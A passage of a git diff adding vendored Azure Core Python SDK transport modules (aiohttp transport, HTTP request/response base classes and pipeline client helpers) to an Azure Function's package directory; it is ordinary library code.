:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + + @overload + async def send(self, request: "RestHttpRequest", **config: Any) -> Optional["RestAsyncHttpResponse"]: + """Send the `azure.core.rest` request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.rest.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + + async def send(self, request, **config): + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword bool stream: Defaults to False. + :keyword dict proxies: dict of proxy to used based on protocol. 
Proxy is a dict (protocol, url) + :keyword str proxy: will define the proxy to use all the time + """ + await self.open() + try: + auto_decompress = self.session.auto_decompress # type: ignore + except AttributeError: + # auto_decompress is introduced in aiohttp 3.7. We need this to handle Python 3.6. + auto_decompress = False + + proxies = config.pop('proxies', None) + if proxies and 'proxy' not in config: + # aiohttp needs a single proxy, so iterating until we found the right protocol + + # Sort by longest string first, so "http" is not used for "https" ;-) + for protocol in sorted(proxies.keys(), reverse=True): + if request.url.startswith(protocol): + config['proxy'] = proxies[protocol] + break + + response: Optional["HTTPResponseType"] = None + config['ssl'] = self._build_ssl_config( + cert=config.pop('connection_cert', self.connection_config.cert), + verify=config.pop('connection_verify', self.connection_config.verify) + ) + # If we know for sure there is not body, disable "auto content type" + # Otherwise, aiohttp will send "application/octect-stream" even for empty POST request + # and that break services like storage signature + if not request.data and not request.files: + config['skip_auto_headers'] = ['Content-Type'] + try: + stream_response = config.pop("stream", False) + timeout = config.pop('connection_timeout', self.connection_config.timeout) + read_timeout = config.pop('read_timeout', self.connection_config.read_timeout) + socket_timeout = aiohttp.ClientTimeout(sock_connect=timeout, sock_read=read_timeout) + result = await self.session.request( # type: ignore + request.method, + request.url, + headers=request.headers, + data=self._get_request_data(request), + timeout=socket_timeout, + allow_redirects=False, + **config + ) + if _is_rest(request): + from azure.core.rest._aiohttp import RestAioHttpTransportResponse + response = RestAioHttpTransportResponse( + request=request, + internal_response=result, + block_size=self.connection_config.data_block_size, + decompress=not auto_decompress + ) + if not stream_response: + await _handle_no_stream_rest_response(response) + else: + response = AioHttpTransportResponse(request, result, + self.connection_config.data_block_size, + decompress=not auto_decompress) + if not stream_response: + await response.load_body() + except aiohttp.client_exceptions.ClientResponseError as err: + raise ServiceResponseError(err, error=err) from err + except aiohttp.client_exceptions.ClientError as err: + raise ServiceRequestError(err, error=err) from err + except asyncio.TimeoutError as err: + raise ServiceResponseError(err, error=err) from err + return response + +class AioHttpStreamDownloadGenerator(AsyncIterator): + """Streams the response body data. + + :param pipeline: The pipeline object + :param response: The client response object. + :param bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. 
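
Consuming the generator looks like the sketch below, assuming a response obtained with ``stream=True`` and the pipeline that produced it:

```python
data = bytearray()
async for chunk in response.stream_download(pipeline, decompress=True):
    data.extend(chunk)  # gzip/deflate chunks are inflated transparently
```
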
+ """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, *, decompress=True) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + self._decompress = decompress + internal_response = response.internal_response + self.content_length = int(internal_response.headers.get('Content-Length', 0)) + self._decompressor = None + + def __len__(self): + return self.content_length + + async def __anext__(self): + internal_response = self.response.internal_response + try: + chunk = await internal_response.content.read(self.block_size) + if not chunk: + raise _ResponseStopIteration() + if not self._decompress: + return chunk + enc = internal_response.headers.get('Content-Encoding') + if not enc: + return chunk + enc = enc.lower() + if enc in ("gzip", "deflate"): + if not self._decompressor: + import zlib + zlib_mode = 16 + zlib.MAX_WBITS if enc == "gzip" else zlib.MAX_WBITS + self._decompressor = zlib.decompressobj(wbits=zlib_mode) + chunk = self._decompressor.decompress(chunk) + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except aiohttp.client_exceptions.ClientPayloadError as err: + # This is the case that server closes connection before we finish the reading. aiohttp library + # raises ClientPayloadError. + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + +class AioHttpTransportResponse(AsyncHttpResponse): + """Methods for accessing response body data. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param aiohttp_response: Returned from ClientSession.request(). + :type aiohttp_response: aiohttp.ClientResponse object + :param block_size: block size of data sent over connection. + :type block_size: int + :param bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, request: HttpRequest, + aiohttp_response: aiohttp.ClientResponse, + block_size=None, *, decompress=True) -> None: + super(AioHttpTransportResponse, self).__init__(request, aiohttp_response, block_size=block_size) + # https://aiohttp.readthedocs.io/en/stable/client_reference.html#aiohttp.ClientResponse + self.status_code = aiohttp_response.status + self.headers = CIMultiDict(aiohttp_response.headers) + self.reason = aiohttp_response.reason + self.content_type = aiohttp_response.headers.get('content-type') + self._content = None + self._decompressed_content = False + self._decompress = decompress + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + """ + return _aiohttp_body_helper(self) + + def text(self, encoding: Optional[str] = None) -> str: + """Return the whole body as a string. + + If encoding is not provided, rely on aiohttp auto-detection. + + :param str encoding: The encoding to apply. 
+ """ + # super().text detects charset based on self._content() which is compressed + # implement the decoding explicitly here + body = self.body() + + ctype = self.headers.get(aiohttp.hdrs.CONTENT_TYPE, "").lower() + mimetype = aiohttp.helpers.parse_mimetype(ctype) + + if not encoding: + # extract encoding from mimetype, if caller does not specify + encoding = mimetype.parameters.get("charset") + if encoding: + try: + codecs.lookup(encoding) + except LookupError: + encoding = None + if not encoding: + if mimetype.type == "application" and ( + mimetype.subtype == "json" or mimetype.subtype == "rdap" + ): + # RFC 7159 states that the default encoding is UTF-8. + # RFC 7483 defines application/rdap+json + encoding = "utf-8" + elif body is None: + raise RuntimeError( + "Cannot guess the encoding of a not yet read body" + ) + else: + try: + import cchardet as chardet + except ImportError: # pragma: no cover + try: + import chardet # type: ignore + except ImportError: # pragma: no cover + import charset_normalizer as chardet # type: ignore[no-redef] + encoding = chardet.detect(body)["encoding"] + if encoding == "utf-8" or encoding is None: + encoding = "utf-8-sig" + + return body.decode(encoding) + + async def load_body(self) -> None: + """Load in memory the body, so it could be accessible from sync methods.""" + try: + self._content = await self.internal_response.read() + except aiohttp.client_exceptions.ClientPayloadError as err: + # This is the case that server closes connection before we finish the reading. aiohttp library + # raises ClientPayloadError. + raise IncompleteReadError(err, error=err) + + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: + """Generator for streaming response body data. + + :param pipeline: The pipeline object + :type pipeline: azure.core.pipeline.Pipeline + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + return AioHttpStreamDownloadGenerator(pipeline, self, **kwargs) + + def __getstate__(self): + # Be sure body is loaded in memory, otherwise not pickable and let it throw + self.body() + + state = self.__dict__.copy() + # Remove the unpicklable entries. + state['internal_response'] = None # aiohttp response are not pickable (see headers comments) + state['headers'] = CIMultiDict(self.headers) # MultiDictProxy is not pickable + return state diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py new file mode 100644 index 0000000..a86cf47 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base.py @@ -0,0 +1,768 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import +import abc +from email.message import Message +import json +import logging +import time +import copy + +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import ( + TYPE_CHECKING, + Generic, + TypeVar, + IO, + List, + Union, + Any, + Mapping, + Dict, + Optional, + Tuple, + Iterator, + Type +) + +from six.moves.http_client import HTTPResponse as _HTTPResponse + +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import ( + ABC, + AbstractContextManager, +) +from ...utils._utils import case_insensitive_dict +from ...utils._pipeline_transport_rest_shared import ( + _format_parameters_helper, + _prepare_multipart_body_helper, + _serialize_request, + _format_data_helper, + BytesIOSocket, + _decode_parts_helper, + _get_raw_parts_helper, + _parts_helper, +) + + +if TYPE_CHECKING: + from collections.abc import MutableMapping + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +PipelineType = TypeVar("PipelineType") + +_LOGGER = logging.getLogger(__name__) + + +def _format_url_section(template, **kwargs): + """String format the template with the kwargs, auto-skip sections of the template that are NOT in the kwargs. + + By default in Python, "format" will raise a KeyError if a template element is not found. Here the section between + the slashes will be removed from the template instead. + + This is used for API like Storage, where when Swagger has template section not defined as parameter. + + :param str template: a string template to fill + :param dict[str,str] kwargs: Template values as string + :rtype: str + :returns: Template completed + """ + components = template.split("/") + while components: + try: + return template.format(**kwargs) + except KeyError as key: + formatted_components = template.split("/") + components = [ + c for c in formatted_components if "{{{}}}".format(key.args[0]) not in c + ] + template = "/".join(components) + # No URL sections left - returning None + + +def _urljoin(base_url, stub_url): + # type: (str, str) -> str + """Append to end of base URL without losing query parameters. + + :param str base_url: The base URL. 
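
Illustrative behaviour of ``_format_url_section`` above (and of ``_urljoin``, whose body follows):

```python
_format_url_section("{account}/container/{name}", name="blob.txt")
# -> "container/blob.txt"  (the section with the unsupplied {account} is dropped)

_urljoin("https://host/base/?sv=1", "stub")
# -> "https://host/base/stub?sv=1"  (query parameters survive the join)
```
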
+ :param str stub_url: Section to append to the end of the URL path. + :returns: The updated URL. + :rtype: str + """ + parsed = urlparse(base_url) + parsed = parsed._replace(path=parsed.path.rstrip("/") + "/" + stub_url) + return parsed.geturl() + +class HttpTransport( + AbstractContextManager, ABC, Generic[HTTPRequestType, HTTPResponseType] +): # type: ignore + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> HTTPResponseType + """Send the request using this HTTP sender. + + :param request: The pipeline request object + :type request: ~azure.core.transport.HTTPRequest + :return: The pipeline response object. + :rtype: ~azure.core.pipeline.transport.HttpResponse + """ + + @abc.abstractmethod + def open(self): + """Assign new session if one does not already exist.""" + + @abc.abstractmethod + def close(self): + """Close the session if it is not externally owned.""" + + def sleep(self, duration): # pylint: disable=no-self-use + time.sleep(duration) + + +class HttpRequest(object): + """Represents a HTTP request. + + URL can be given without query parameters, to be added later using "format_parameters". + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + + def __init__(self, method, url, headers=None, files=None, data=None): + # type: (str, str, Mapping[str, str], Any, Any) -> None + self.method = method + self.url = url + self.headers = case_insensitive_dict(headers) + self.files = files + self.data = data + self.multipart_mixed_info = None # type: Optional[Tuple] + + def __repr__(self): + return "".format( + self.method, self.url + ) + + def __deepcopy__(self, memo=None): + try: + data = copy.deepcopy(self.body, memo) + files = copy.deepcopy(self.files, memo) + request = HttpRequest(self.method, self.url, self.headers, files, data) + request.multipart_mixed_info = self.multipart_mixed_info + return request + except (ValueError, TypeError): + return copy.copy(self) + + @property + def query(self): + """The query parameters of the request as a dict. + + :rtype: dict[str, str] + """ + query = urlparse(self.url).query + if query: + return {p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")]} + return {} + + @property + def body(self): + """Alias to data. + + :rtype: bytes + """ + return self.data + + @body.setter + def body(self, value): + self.data = value + + @staticmethod + def _format_data(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. + """ + return _format_data_helper(data) + + def format_parameters(self, params): + # type: (Dict[str, str]) -> None + """Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param dict params: A dictionary of parameters. + """ + return _format_parameters_helper(self, params) + + def set_streamed_data_body(self, data): + """Set a streamable data body. + + :param data: The request field data. 
+ :type data: stream or generator or asyncgenerator + """ + if not isinstance(data, binary_type) and not any( + hasattr(data, attr) for attr in ["read", "__iter__", "__aiter__"] + ): + raise TypeError( + "A streamable data source must be an open file-like object or iterable." + ) + self.data = data + self.files = None + + def set_text_body(self, data): + """Set a text as body of the request. + + :param data: A text to send as body. + :type data: str + """ + if data is None: + self.data = None + else: + self.data = data + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_xml_body(self, data): + """Set an XML element tree as the body of the request. + + :param data: The request field data. + :type data: XML node + """ + if data is None: + self.data = None + else: + bytes_data = ET.tostring(data, encoding="utf8") + self.data = bytes_data.replace(b"encoding='utf8'", b"encoding='utf-8'") + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_json_body(self, data): + """Set a JSON-friendly object as the body of the request. + + :param data: A JSON serializable object + """ + if data is None: + self.data = None + else: + self.data = json.dumps(data) + self.headers["Content-Length"] = str(len(self.data)) + self.files = None + + def set_formdata_body(self, data=None): + """Set form-encoded data as the body of the request. + + :param data: The request field data. + :type data: dict + """ + if data is None: + data = {} + content_type = self.headers.pop("Content-Type", None) if self.headers else None + + if content_type and content_type.lower() == "application/x-www-form-urlencoded": + self.data = {f: d for f, d in data.items() if d is not None} + self.files = None + else: # Assume "multipart/form-data" + self.files = { + f: self._format_data(d) for f, d in data.items() if d is not None + } + self.data = None + + def set_bytes_body(self, data): + """Set generic bytes as the body of the request. + + Will set content-length. + + :param data: The request field data. + :type data: bytes + """ + if data: + self.headers["Content-Length"] = str(len(data)) + self.data = data + self.files = None + + def set_multipart_mixed(self, *requests, **kwargs): + # type: (HttpRequest, Any) -> None + """Set the part of a multipart/mixed. + + Only supported args for now are HttpRequest objects. + + boundary is optional, and one will be generated if you don't provide one. + Note that no verification are made on the boundary, this is considered advanced + enough so you know how to respect RFC1341 7.2.1 and provide a correct boundary. + + Any additional kwargs will be passed into the pipeline context for per-request policy + configuration. + + :keyword list[SansIOHTTPPolicy] policies: SansIOPolicy to apply at preparation time + :keyword str boundary: Optional boundary + :param requests: HttpRequests object + """ + self.multipart_mixed_info = ( + requests, + kwargs.pop("policies", []), + kwargs.pop("boundary", None), + kwargs + ) + + def prepare_multipart_body(self, content_index=0): + # type: (int) -> int + """Will prepare the body of this request according to the multipart information. + + This call assumes the on_request policies have been applied already in their + correct context (sync/async) + + Does nothing if "set_multipart_mixed" was never called. + + :param int content_index: The current index of parts within the batch message. + :returns: The updated index after all parts in this request have been added. 
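A hedged usage sketch of the body setters above (the endpoint is hypothetical):

    request = HttpRequest("POST", "https://example.com/api")
    request.format_parameters({"api-version": "2021-01-01"})  # appends ?api-version=... to the URL
    request.set_json_body({"name": "test"})  # json.dumps the payload and sets Content-Length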
+        :rtype: int
+        """
+        return _prepare_multipart_body_helper(self, content_index)
+
+    def serialize(self):
+        # type: () -> bytes
+        """Serialize this request using application/http spec.
+
+        :rtype: bytes
+        """
+        return _serialize_request(self)
+
+class _HttpResponseBase(object):
+    """Represent an HTTP response.
+
+    No body is defined here on purpose, since the async pipeline
+    will provide async ways to access the body.
+    Full in-memory access uses "body" as bytes.
+
+    :param request: The request.
+    :type request: ~azure.core.pipeline.transport.HttpRequest
+    :param internal_response: The object returned from the HTTP library.
+    :param int block_size: Defaults to 4096 bytes.
+    """
+
+    def __init__(self, request, internal_response, block_size=None):
+        # type: (HttpRequest, Any, Optional[int]) -> None
+        self.request = request
+        self.internal_response = internal_response
+        self.status_code = None  # type: Optional[int]
+        self.headers = {}  # type: MutableMapping[str, str]
+        self.reason = None  # type: Optional[str]
+        self.content_type = None  # type: Optional[str]
+        self.block_size = block_size or 4096  # Default to same as Requests
+
+    def body(self):
+        # type: () -> bytes
+        """Return the whole body as bytes in memory.
+        """
+        raise NotImplementedError()
+
+    def text(self, encoding=None):
+        # type: (str) -> str
+        """Return the whole body as a string.
+
+        :param str encoding: The encoding to apply. If None, use "utf-8" with BOM parsing (utf-8-sig).
+            Implementations can be smarter if they want (using headers or chardet).
+        """
+        if encoding == "utf-8" or encoding is None:
+            encoding = "utf-8-sig"
+        return self.body().decode(encoding)
+
+    def _decode_parts(self, message, http_response_type, requests):
+        # type: (Message, Type[_HttpResponseBase], List[HttpRequest]) -> List[HttpResponse]
+        """Rebuild an HTTP response from pure string."""
+        return _decode_parts_helper(self, message, http_response_type, requests, _deserialize_response)
+
+    def _get_raw_parts(self, http_response_type=None):
+        # type: (Optional[Type[_HttpResponseBase]]) -> Iterator[HttpResponse]
+        """Assuming this body is multipart, return the iterator of parts.
+
+        If parts are application/http, use http_response_type or HttpClientTransportResponse
+        as the envelope.
+        """
+        return _get_raw_parts_helper(self, http_response_type or HttpClientTransportResponse)
+
+    def raise_for_status(self):
+        # type: () -> None
+        """Raises an HttpResponseError if the response has an error status code.
+        If response is good, does nothing.
+        """
+        if self.status_code >= 400:
+            raise HttpResponseError(response=self)
+
+    def __repr__(self):
+        # there doesn't have to be a content type
+        content_type_str = (
+            ", Content-Type: {}".format(self.content_type) if self.content_type else ""
+        )
+        return "<{}: {} {}{}>".format(
+            type(self).__name__, self.status_code, self.reason, content_type_str
+        )
+
+
+class HttpResponse(_HttpResponseBase):  # pylint: disable=abstract-method
+    def stream_download(self, pipeline, **kwargs):
+        # type: (PipelineType, **Any) -> Iterator[bytes]
+        """Generator for streaming response body data.
+
+        Should be implemented by sub-classes if streaming download
+        is supported.
+
+        :rtype: iterator[bytes]
+        """
+
+    def parts(self):
+        # type: () -> Iterator[HttpResponse]
+        """Assuming the content-type is multipart/mixed, will return the parts as an iterator.
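A minimal multipart/mixed sketch under the same assumptions (hypothetical URLs). In normal use the pipeline calls prepare_multipart_body itself; it is invoked directly here only to show the flow:

    batch = HttpRequest("POST", "https://example.com/$batch")
    batch.set_multipart_mixed(
        HttpRequest("DELETE", "/items/1"),
        HttpRequest("DELETE", "/items/2"),
    )
    batch.prepare_multipart_body()  # serializes both parts into batch.data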
+ + :rtype: iterator[HttpResponse] + :raises ValueError: If the content is not multipart/mixed + """ + return _parts_helper(self) + + +class _HttpClientTransportResponse(_HttpResponseBase): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + + :param HttpRequest request: The request. + :param httpclient_response: The object returned from an HTTP(S)Connection from http.client + """ + + def __init__(self, request, httpclient_response): + super(_HttpClientTransportResponse, self).__init__(request, httpclient_response) + self.status_code = httpclient_response.status + self.headers = case_insensitive_dict(httpclient_response.getheaders()) + self.reason = httpclient_response.reason + self.content_type = self.headers.get("Content-Type") + self.data = None + + def body(self): + if self.data is None: + self.data = self.internal_response.read() + return self.data + + +class HttpClientTransportResponse(_HttpClientTransportResponse, HttpResponse): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + """ + + +def _deserialize_response( + http_response_as_bytes, http_request, http_response_type=HttpClientTransportResponse +): + local_socket = BytesIOSocket(http_response_as_bytes) + response = _HTTPResponse(local_socket, method=http_request.method) + response.begin() + return http_response_type(http_request, response) + + +class PipelineClientBase(object): + """Base class for pipeline clients. + + :param str base_url: URL for the request. + """ + + def __init__(self, base_url): + self._base_url = base_url + + def _request( + self, + method, # type: str + url, # type: str + params, # type: Optional[Dict[str, str]] + headers, # type: Optional[Dict[str, str]] + content, # type: Any + form_content, # type: Optional[Dict[str, Any]] + stream_content, # type: Any + ): + # type: (...) -> HttpRequest + """Create HttpRequest object. + + If content is not None, guesses will be used to set the right body: + - If content is an XML tree, will serialize as XML + - If content-type starts by "text/", set the content as text + - Else, try JSON serialization + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: URL for the request. + :param dict params: URL query parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = HttpRequest(method, self.format_url(url)) + + if params: + request.format_parameters(params) + + if headers: + request.headers.update(headers) + + if content is not None: + content_type = request.headers.get("Content-Type") + if isinstance(content, ET.Element): + request.set_xml_body(content) + # https://github.com/Azure/azure-sdk-for-python/issues/12137 + # A string is valid JSON, make the difference between text + # and a plain JSON string. 
+ # Content-Type is a good indicator of intent from user + elif content_type and content_type.startswith("text/"): + request.set_text_body(content) + else: + try: + request.set_json_body(content) + except TypeError: + request.data = content + + if form_content: + request.set_formdata_body(form_content) + elif stream_content: + request.set_streamed_data_body(stream_content) + + return request + + def format_url(self, url_template, **kwargs): + # type: (str, Any) -> str + """Format request URL with the client base URL, unless the + supplied URL is already absolute. + + :param str url_template: The request URL to be formatted if necessary. + """ + url = _format_url_section(url_template, **kwargs) + if url: + parsed = urlparse(url) + if not parsed.scheme or not parsed.netloc: + url = url.lstrip("/") + try: + base = self._base_url.format(**kwargs).rstrip("/") + except KeyError as key: + err_msg = "The value provided for the url part {} was incorrect, and resulted in an invalid url" + raise ValueError(err_msg.format(key.args[0])) + + url = _urljoin(base, url) + else: + url = self._base_url.format(**kwargs) + return url + + def get( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + ): + # type: (...) -> HttpRequest + """Create a GET request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "GET", url, params, headers, content, form_content, None + ) + request.method = "GET" + return request + + def put( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a PUT request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "PUT", url, params, headers, content, form_content, stream_content + ) + return request + + def post( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a POST request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. 
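A short sketch of how format_url resolves a relative template against the client base URL (the "{account}" host is hypothetical):

    client = PipelineClientBase("https://{account}.example.com")
    url = client.format_url("/items/{id}", account="myacct", id="42")
    # -> "https://myacct.example.com/items/42"
    request = client.post(url, content={"name": "x"})  # dict content falls through to set_json_body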
+ :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "POST", url, params, headers, content, form_content, stream_content + ) + return request + + def head( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a HEAD request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "HEAD", url, params, headers, content, form_content, stream_content + ) + return request + + def patch( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a PATCH request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "PATCH", url, params, headers, content, form_content, stream_content + ) + return request + + def delete(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest + """Create a DELETE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "DELETE", url, params, headers, content, form_content, None + ) + return request + + def merge(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest + """Create a MERGE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "MERGE", url, params, headers, content, form_content, None + ) + return request + + def options(self, url, params=None, headers=None, **kwargs): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any) -> HttpRequest + """Create a OPTIONS request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. 
+ :param dict headers: Headers + :keyword content: The body content + :keyword dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + content = kwargs.get("content") + form_content = kwargs.get("form_content") + request = self._request( + "OPTIONS", url, params, headers, content, form_content, None + ) + return request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py new file mode 100644 index 0000000..f4dc02a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py @@ -0,0 +1,134 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import asyncio +import abc +from collections.abc import AsyncIterator + +from typing import AsyncIterator as AsyncIteratorType, TypeVar, Generic, Any +from ._base import ( + _HttpResponseBase, + _HttpClientTransportResponse, +) +from ...utils._pipeline_transport_rest_shared_async import _PartGenerator + +try: + from contextlib import AbstractAsyncContextManager # type: ignore +except ImportError: # Python <= 3.7 + + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +class _ResponseStopIteration(Exception): + pass + + +def _iterate_response_content(iterator): + """"To avoid: + TypeError: StopIteration interacts badly with generators and cannot be raised into a Future + """ + try: + return 